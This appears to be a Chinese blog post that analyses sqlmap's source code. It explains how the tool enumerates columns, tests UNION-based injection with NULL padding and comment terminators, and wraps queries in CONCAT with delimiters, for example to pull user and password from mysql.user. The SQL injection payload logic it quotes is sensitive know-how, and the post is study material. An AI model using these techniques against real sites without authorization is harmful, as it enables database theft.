回顾
上一篇主要说了SQLMAP从main如何一步一步运行到action()
函数,然后我对MySQL的版本识别和识别确认进行了具体的分析。其中暂未分析的inject.getValue
函数至关重要,将是我们这一节的关键部分;另外识别到DBMS之后,如何做进一步的注入也是需要关注的点
ExpandAsteriskForColumns
inject.getValue
函数能够根据传入的payload直接的得到返回结果,例如mysql识别插件这一部分
query = "CONCAT('%s', '%s')" % (randInt, randInt)
if inject.getValue(query) == (randInt * 2):
logMsg = "confirming MySQL"
输入CONCAT(1,1)
,判断返回是否是11,这个11应该是如何得到的呢?这也是做自动化注入工具的难点
看到getValue
前两行做了一个前置处理
expression = cleanQuery(expression)
expression = expandAsteriskForColumns(expression)
cleanQuery
作用比较简单,将部分小写全部替换为大写
def cleanQuery(query):
upperQuery = query.replace("select ", "SELECT ")
upperQuery = upperQuery.replace(" from ", " FROM ")
upperQuery = upperQuery.replace(" limit ", " LIMIT ")
upperQuery = upperQuery.replace(" offset ", " OFFSET ")
upperQuery = upperQuery.replace(" order by ", " ORDER BY ")
upperQuery = upperQuery.replace(" group by ", " GROUP BY ")
upperQuery = upperQuery.replace(" union all ", " UNION ALL ")
return upperQuery
expandAsteriskForColumns
作用是把SELECT * FROM db.table
这样语句中的*转为具体列名
首先正则匹配SELECT * FROM db.table
asterisk = re.search("^SELECT\s+\*\s+FROM\s+(\w+)[\.]+(\w+)\s*", expression, re.I)
正则匹配到的db和table保存至全局变量,调用getColumns
函数
conf.db = asterisk.group(1)
conf.tbl = asterisk.group(2)
columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)
跟入getColumns
函数,我们以MySQL为例,略过MSSQL和Oracle,因为大同小异。这里调用的queries
正是第一篇分析文章一开始提到的queries.xml
文章
rootQuery = queries[kb.dbms].columns
例如这里的rootQuery
在xml中寻找到对应的部分如下,inband方式的注入是直接从information_schema.COLUMNS
里查。对于限制回显数或者其他情况应该采用盲注(这里感觉取名blind不是很合适)的方式,使用LIMIT限制每次查出的数据,并将字段类型和字段名分开查询
<columns>
<inband query="SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
<blind query="SELECT column_name FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d, 1" query2="SELECT column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s'"/>
</columns>
回到代码中,PostgreSQL和MySQL都有information_schema
库,首先尝试直接查询,也就是inband方式。发现后续又调用inject.getValue
函数,将xml中的查询语句作为payload传入,处理得到结果保存至self.cachedColumns[conf.db] = table
if conf.unionUse:
if kb.dbms in ( "MySQL", "PostgreSQL" ):
query = rootQuery["inband"]["query"] % (conf.tbl, conf.db)
value = inject.getValue(query, blind=False)
if value:
table = {}
columns = {}
for column, colType in value:
columns[column] = colType
table[conf.tbl] = columns
self.cachedColumns[conf.db] = table
如果上述过程没有顺利执行,self.cachedColumns
中取不到结果,那么尝试以blind方式(称之为盲注不是很恰当)做执行。后续是对字段总数的查询,如果返回不合法抛出异常
if not self.cachedColumns:
if kb.dbms in ( "MySQL", "PostgreSQL" ):
query = rootQuery["blind"]["count"] % (conf.tbl, conf.db)
count = inject.getValue(query, inband=False, expected="int")
if not count.isdigit() or not len(count) or count == "0":
......
raise sqlmapNoneDataException, errMsg
后续代码我做了一个简化,只取MySQL关键部分。getRange
函数根据数据库类型做了一个划分,MySQL等多数数据库的LIMIT应当从0开始,但Oracle是从1开始。然后以xml的blind方式查列名,LIMIT方式执行多次分页查询后得到所有的列名并保存至self.cachedColumns
并return
indexRange = getRange(count)
for index in indexRange:
if kb.dbms in ( "MySQL", "PostgreSQL" ):
query = rootQuery["blind"]["query"] % (conf.tbl, conf.db, index)
colType = inject.getValue(query, inband=False)
columns[column] = colType
if columns:
table[conf.tbl] = columns
self.cachedColumns[conf.db] = table
return self.cachedColumns
回到最开始expandAsteriskForColumns
函数,如果取到的self.cachedColumns
不为空,认为查到了输入db.table对应的字段名,将表达式中的*替换为table的columns
if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:
columns = columnsDict[conf.db][conf.tbl].keys()
columns.sort()
columnsStr = ", ".join([column for column in columns])
expression = expression.replace("*", columnsStr, 1)
infoMsg = "the query with column names is: "
infoMsg += "%s" % expression
logger.info(infoMsg)
return expression
goInband
分析完expandAsteriskForColumns
函数,继续看inject.getValue
,之前的函数只是做了一个预处理,真正的核心部分是__goInband
和__goInferenceProxy
。逻辑是先调用__goInband
尝试得到结果,如果得不到将使用__goInferenceProxy
的方式
if inband and conf.unionUse and kb.dbms:
value = __goInband(expression, expected)
if blind and not value:
value = __goInferenceProxy(expression, fromUser, expected)
return value
进入goInband
函数,代码里其实不小,但仔细观察可以发现,核心函数是output = unionUse(expression)
,其他部分代码大都是处理sqlmap的保存功能,这部分不难,就是把一些执行结果和状态以[url][注入点][注入参数][表达式][日志]
格式保存到本地文件中,如果重复对一个站点做注入,将会读取这样的文件,提高效率。回到主题,我们跟入unionUse
函数,在unionUse
的一开始,调用了unionTest
函数,主要是测试目标是否可以被union select语法注入,核心部分代码删减后如下
value = ""
query = agent.prefixQuery("UNION ALL SELECT NULL")
for comment in ("--", "#", "/*", ";", "%00"):
value = __effectiveUnionTest(query, comment)
if value:
setUnion(comment, value.count("NULL"))
break
return value
跟入agent.prefixQuery
函数,发现是对UNION ALL SELECT NULL
拼了一个前缀,前缀是注入的闭合符号,具体如何检测闭合符合我在上一篇文章中有分析到,将闭合符号拼接在payload之前得到一个新的查询payload
query = ""
if kb.injType == "numeric":
pass
elif kb.injType in ( "stringsingle", "likesingle" ):
query = "'"
elif kb.injType in ( "stringdouble", "likedouble" ):
query = "\""
else:
raise sqlmapNoneDataException, "unsupported injection type"
if kb.parenthesis != None:
query += "%s " % (")" * kb.parenthesis)
query += string
return query
effectiveUnionTest
继续分析__effectiveUnionTest
函数,该函数主要作用是检测有效的payload,我将代码做了一下简化。注意这里传入的query是上文添加了前缀的UNION ALL SELECT NULL
,每一次的循环
agent.postfixQuery
函数代码如下,它的作用是将传入的[闭合符]+UNION ALL SELECT [n个NULL]
根据注入类型变成[闭合符]+UNION ALL SELECT [n个NULL] [注释符] AND [随机变量]=[随机变量]
agent.payload
函数代码较简单,是将请求中的参数或请求头根据检测到的注入点替换
Request.queryPage
函数的返回值不确定,有可能是Bool,但根据代码后续逻辑判断,不可能是Bool,这个函数的另一个返回值是responseBody的md5,用来校验是否相等的,比纯字符串效率高,值得学习的优化手段
下方的if作用是统计每次循环得到的响应md5不同的次数,次数为该dict的value[0],最终如果能得到的次数为1的情况,就能说明union生效,并且得到了查询字段数,见下图
for count in range(0, 50):
if count:
query += ", NULL"
commentedQuery = agent.postfixQuery(query, comment)
payload = agent.payload(newValue=commentedQuery)
newResult = Request.queryPage(payload)
if not newResult in resultDict.keys():
resultDict[newResult] = (1, commentedQuery)
else:
resultDict[newResult] = (resultDict[newResult][0] + 1, commentedQuery)
if count:
for element in resultDict.values():
if element[0] == 1:
......
return value
def postfixQuery(self, string, comment=None):
randInt = randomInt()
randStr = randomStr()
if comment:
string += "%s" % comment
if kb.parenthesis != None:
string += " AND %s" % ("(" * kb.parenthesis)
else:
raise sqlmapNoneDataException, "unable to get the number of parenthesis"
if kb.injType == "numeric":
string += "%d=%d" % (randInt, randInt)
elif kb.injType == "stringsingle":
string += "'%s'='%s" % (randStr, randStr)
elif kb.injType == "likesingle":
string += "'%s' LIKE '%s" % (randStr, randStr)
elif kb.injType == "stringdouble":
string += "\"%s\"=\"%s" % (randStr, randStr)
elif kb.injType == "likedouble":
string += "\"%s\" LIKE \"%s" % (randStr, randStr)
else:
raise sqlmapNoneDataException, "unsupported injection type"
return string
可以看我的例子,如果select后的null不符合查询字段数,会报错,导致页面返回错误或空。而循环50次期间错误数应该为49次,导致49次的responseBody的md5相等。正确返回次数应为1次,代码中if element[0] == 1
才会把value返回出去(这个value类似一个flag,对逻辑没有什么影响)
另外一个小细节,上文两处if count
是在第二次循环才触发,因为左闭右开规则
得到的value做了如下的操作,setUnion
函数主要是保存了当前状态,然后设置kb.unionCount
,也就是查询字段数,在后续构造中有大用
if value:
setUnion(comment, value.count("NULL"))
break
if kb.unionCount:
logMsg = "the target url could be affected by an "
logMsg += "inband sql injection vulnerability"
logger.info(logMsg)
回到最开始的unionUse
函数,先看前半部分代码
之前的test如果顺利,那么kb.unionCount
将不为空
if not kb.unionCount:
return
# Prepare expression with delimiters
expression = agent.concatQuery(expression)
expression = unescaper.unescape(expression)
# Confirm the inband SQL injection and get the exact column
# position only once
if not isinstance(kb.unionPosition, int):
count = __unionPosition(count, expression)
# Assure that the above function found the exploitable inband
# SQL injection position
if not isinstance(kb.unionPosition, int):
return
concatQuery
首先来看concatQuery
函数,这个函数比较复杂
1.使用正则找出查询字段数
def getFields(self, query):
fieldsSelectTop = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectDistinct = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", query, re.I)
fieldsSelectFrom = re.search("\ASELECT\s+(.+?)\s+FROM\s+", query, re.I)
fieldsSelect = re.search("\ASELECT\s+(.*)", query, re.I)
fieldsNoSelect = query
if fieldsSelectTop:
fieldsToCast = fieldsSelectTop.groups()[0]
elif fieldsSelectDistinct:
fieldsToCast = fieldsSelectDistinct.groups()[0]
elif fieldsSelectFrom:
fieldsToCast = fieldsSelectFrom.groups()[0]
elif fieldsSelect:
fieldsToCast = fieldsSelect.groups()[0]
elif fieldsNoSelect:
fieldsToCast = fieldsNoSelect
return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast
2.做一些强制转换,例如VERSION()
会被转为IFNULL(CAST(VERSION() AS CHAR(10000)), ' ')
,IFNULL
的作用是如果第一个参数为空就返回第一个,否则第二个。而CAST(VERSION() AS CHAR(10000))
和VERSION()
没什么区别,都是返回版本,这里是一个示范,实际上其他字符串的效果也是一样
nulledCastedField = queries[kb.dbms].cast % field
nulledCastedField = queries[kb.dbms].isnull % nulledCastedField
<cast query="CAST(%s AS CHAR(10000))"/>
<isnull query="IFNULL(%s, ' ')"/>
3.批量转换,例如user,password
转为IFNULL(CAST(user AS CHAR(10000)), ' '),'UWciUe',IFNULL(CAST(password AS CHAR(10000)), ' ')
,其中穿插的这个随机字符串是在Agent的init中生成的,也就是下方代码的temp.delimiter
for field in fieldsSplitted:
nulledCastedFields.append(self.nullAndCastField(field))
delimiterStr = "%s'%s'%s" % (dbmsDelimiter, temp.delimiter, dbmsDelimiter)
nulledCastedConcatFields = delimiterStr.join([field for field in nulledCastedFields])
class Agent:
def __init__(self):
temp.delimiter = randomStr(6)
......
4.最终替换,效果是SELECT user, password FROM mysql.user
变成CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user
,
if fieldsSelectFrom:
concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
concatQuery = concatQuery.replace(" FROM ", ",'%s') FROM " % temp.stop, 1)
elif fieldsSelect:
concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1)
concatQuery += ",'%s')" % temp.stop
elif fieldsNoSelect:
concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop)
下文的expression = unescaper.unescape(expression)
在第一篇简单的说成是编码解码,其实不标准,跟入MySQL的DBMS插件可以看到该函数的作用是将字符串转为CHAR(X),CHAR(Y)
这样ASCII码格式
unionPosition
继续分析unionUse
函数,可以看到__unionPosition
这样一个函数,这应该是最核心的部分了。该篇文章篇幅已经很大了,我将在下一篇中继续分析。可以看出,inject.getValue
这个函数远比我设想的要复杂多了,当然也可以看出sqlmap的强大之处